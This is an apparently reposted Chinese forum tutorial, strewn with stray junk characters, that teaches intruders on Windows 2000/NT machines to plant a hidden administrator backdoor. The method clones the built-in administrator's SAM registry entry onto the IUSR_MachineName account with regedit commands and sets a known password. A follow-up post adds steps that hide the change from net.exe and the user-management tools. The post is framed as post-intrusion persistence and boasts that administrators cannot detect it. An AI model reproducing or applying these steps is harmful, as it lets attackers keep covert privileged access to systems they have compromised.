|
[url=] 减小字体[/url] [url=] 增大字体[/url] 经常看到一些人在入侵一台Windows 2000或者Windows NT后堂而皇之地创建一个管理员组的用户,似乎当管理员不存在一般,今天偶违背一下偶以前的初衷,Share一个类似于RootKit的玩艺,当然,这些过程也是可以用脚本实现的,但是我就不写了,OK,Show Time Now。 , l3 ?! q4 k, R0 x+ c3 U2 n/ K
6 V/ S! K) i' I. `首先要让大家知道的概念是在Windows 2000和Windows NT里,默认管理员帐号的SID是固定的500(0x1f4),那么我们可以用机器里已经存在的一个帐号将SID为500的帐号进行克隆,在这里我们选择的帐号是IUSR_MachineName(当然,为了加强隐蔽性,我们选择了这个帐号,所有用户都可以用以下的方法,只不过这个用户较常见罢了),测试环境为Windows 2000 Server。
/ J# F) p+ t; q! r- z3 |* o& \" Q1 G: M! q. c
运行一个System的CMD Shell( http://www.sometips.com/tips/scripts/173.htm 或使用 Http://www.sometips.com/soft/psu.exe),然后在该CMD Shell里面运行
+ l `$ u) g0 a' e以下是引用片段:1 c$ D' K, h3 N8 I4 u: q, s
regedit /e adam.reg HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000001F4 6 d* t5 r& f7 m+ ^$ d+ j
Y) E' h7 U) Z3 r, f这样我们将SID 为500的管理员帐号的相关信息导出,然后编辑adam.reg文件,将adam.reg文件的第三行--[HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000001F4]最后的’1F4’修改为IUSR_MachineName的SID(大部分的机器该用户的SID都为0x3E9,如果机器在最初安装的时候没有安装IIS,而自己创建了帐号后再安装IIS就有可能不是这个值),将Root.reg文件中的’1F4’修改为’3E9’后执行
5 N& b P* o# Dregedit /s adam.reg * {( t$ t( M! a( T7 g7 ~
导入该Reg文件
7 c+ f) m8 e, R7 @* u
3 O6 c5 b9 L8 D然后运行 6 @- F+ i: |! u' B
net user IUSR_MachineName Sometips 6 J( y- J# P; ]# m9 K& `
修改IUSR_MachineName的密码(最好使用14位的密码,越像IUSR_MachineName的密码越好) , W& g! `" w' z# Q h( s @* c
7 z- d! X6 c0 r' y% OOK,大功告成...
; g# f% w1 l6 d
7 f* c3 M! \- o" |" d5 g- E这样,我们拥有和默认管理员一样的桌面、一样的Profile.....
8 X6 T7 n& `" [- I* |+ V而且,当我们运行 net localgroup administrators 时,看看结果: 3 n0 W) x2 E2 k1 Y& I, C2 I
以下是引用片段:
7 E4 l* k& I3 u7 W& cC:/>net localgroup administrators $ d8 K1 q- {" H( D) D; H
Alias name administrators * o, u, w9 p) x1 b* l+ B
Comment Administrators have complete and unrestricted access to the computer/domain % F' Y3 _/ _1 Q+ Q( h; x. [
$ g7 y+ E$ `, B% K( Q' yMembers
. M2 a0 ? H1 ^3 [6 i, i6 `: c) g2 L3 Z* h# G r
-------------------------------------------------------------------------------
( f. U% r2 q4 g& ]/ b J& DAdministrator
8 u7 X/ a; n- L0 j! GThe command completed successfully.
1 G! x$ l( d5 Z ]9 B) B W) ]8 M3 R+ N) A: n
再看看USER2SID的输出结果: & i, g! z# l1 h
C:/>user2sid Administrator : ]% l9 o3 n3 `. Y" m. j$ w+ N
6 v; j; n- U- X% p5 Y
S-1-5-21-1004336348-1078145449-854245398-500
" R3 K) a7 S4 I5 l- p& \$ }* j% g0 y I" w5 p5 f. G' B. _3 _; s
Number of subauthorities is 5
6 b0 Y e/ O" d/ L" W% u) f! EDomain is IDONTKNOW
5 }& M- g8 y- d4 k! W# v$ ]Length of SID in memory is 28 bytes / E) y: Z+ H" {. G9 G
Type of SID is SidTypeUser ( n$ K* Q, v, U3 `9 {% }
; ^# h9 L1 h w! rC:/>user2sid iusr_machinename 1 H2 g! _- h, Q: t
/ v! U. D, m1 d4 H9 G: o1 j3 eS-1-5-21-1004336348-1078145449-854245398-1001 * l7 I3 I# D1 a) M3 T
% a# B1 N8 D# C# E4 e/ i/ L. CNumber of subauthorities is 5
* d. W% w+ |( ^& gDomain is IDONTKNOW - r/ E# p7 ?. K$ n. B4 X
Length of SID in memory is 28 bytes , y$ }. n" _" x
Type of SID is SidTypeUser / d( Y, D+ P E+ P) w
4 |8 b& D6 a7 V/ a* L& `
我想,再高明的管理员也看不到任何的异状了...而且,随便管理员改成什么密码,我照样可以用IUSR_MachineName,密码为Sometips登陆...(没有哪位大侠级的管理员喜欢经常修改IUSR_MachineName为其他的名字吧) 4 |8 D) H5 w8 t2 ~( e& {3 }
6 Y& e0 C0 _# |^_^,这算不算RootKit...
% x& ^5 T' Y" @3 }' T/ K# a: n/ H- D4 t2 l; p) X' y
附:
" _. C! W! H; i5 T( I1、感谢叮叮付出需要reinstall OS的代价...
) y0 E# g, ]6 y$ t- r2、任何用以上方法进行试验所导致的系统无法使用均与偶无关,偶均不提供技术支持... ; g& i1 Z1 q( l/ H3 _+ r
7 e4 f# S- `# g5 M/ ^-----------------------------------------------------------------------------
2 R/ ~% S- D) A; a; O7 E( F0 }
+ m- E& w3 w0 }! `, ]& l/ D0 v叮叮 的补充完善
9 y+ b, _* Q9 }+ W% c. z1 g# {6 D# J3 c0 u1 v& K3 `8 [
很多人提到使用了管理工具的用户管理后,能够发现IUSR_MachineName被提升了权限。 ! X% {2 T5 Y% f- ]6 r
现给出解决办法。 ! v- `6 l8 q9 a8 l% T+ R
" n1 L4 s; Y9 J1 ~方法同上,不过这次修改内容多一些。即 . j1 ?. O4 `9 W3 y
这次要导出两个key内容: # N' Q% i& e) w
一个是adam提到的
! _3 u3 M3 g& m/ Y' k; t以下是引用片段:* r) K! C7 d+ q/ P. B( H
regedit /e adam.reg HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000001F4 ! o7 F1 ~" F& T7 N) b
, W: r" N5 s" u' f8 P9 Q" K
然后另外一个是你需要修改那个账号的值 5 W6 r1 d/ S* C' f& r$ E8 n& u6 P
以下是引用片段:& ~; c8 n' \5 ~* H c' S, F
regedit /e iusr.reg HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000003E9 然后按照adam提到的修改adam.reg
$ ~4 l" ?, x% J7 F$ X) d6 |“将adam.reg文件的第三行 以下是引用片段:8 k" X; s3 w. C$ W( [( E
--[HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000001F4]最后的’1F4’ * y7 I; H& O& n* f, f, \/ `
修改为IUSR_MachineName的SID” ) p" K5 N0 y! g f" t
1 T& e6 N+ A( K3 R- V: l$ V! P" a; S
现在,你还要从iusr.reg文件中复制一下内容 0 R) ~0 Y1 }8 n- { K3 b
就是将iusr.reg文件中“’V’=hex:0”开始一直到iusr.reg文件结束部分复制下来 ' N" x9 t7 y. r( y$ Y
然后替换掉adam.reg中同样位置的部分
]2 O; ^: N5 k7 D1 |+ t) d3 f6 ^) ]# c- k$ a2 _% Z6 Z
最后使用
! F9 A# w: {! ~; Wregedit /s adam.reg
- i% r$ L. y2 X3 Y5 s8 h导入该Reg文件 . F" d1 e7 Q' D: L7 R3 B
呵呵,别忘了给这个IUSR_MachineName改密码哦。 Y7 [, j- V0 d$ O$ V4 I
hehe,ok,大功告成。 % V% j5 z" O; l0 T
现在IUSR_MachineName账号拥有了管理员的权限,但是你使用net.exe和
5 F, e' H) a4 t6 c' n8 S: A管理工具中的用户管理都将看不到任何痕迹,即使你去察看所属于的组和用户。
2 y. N0 z9 o5 J都和修改前没有任何区别。 |
|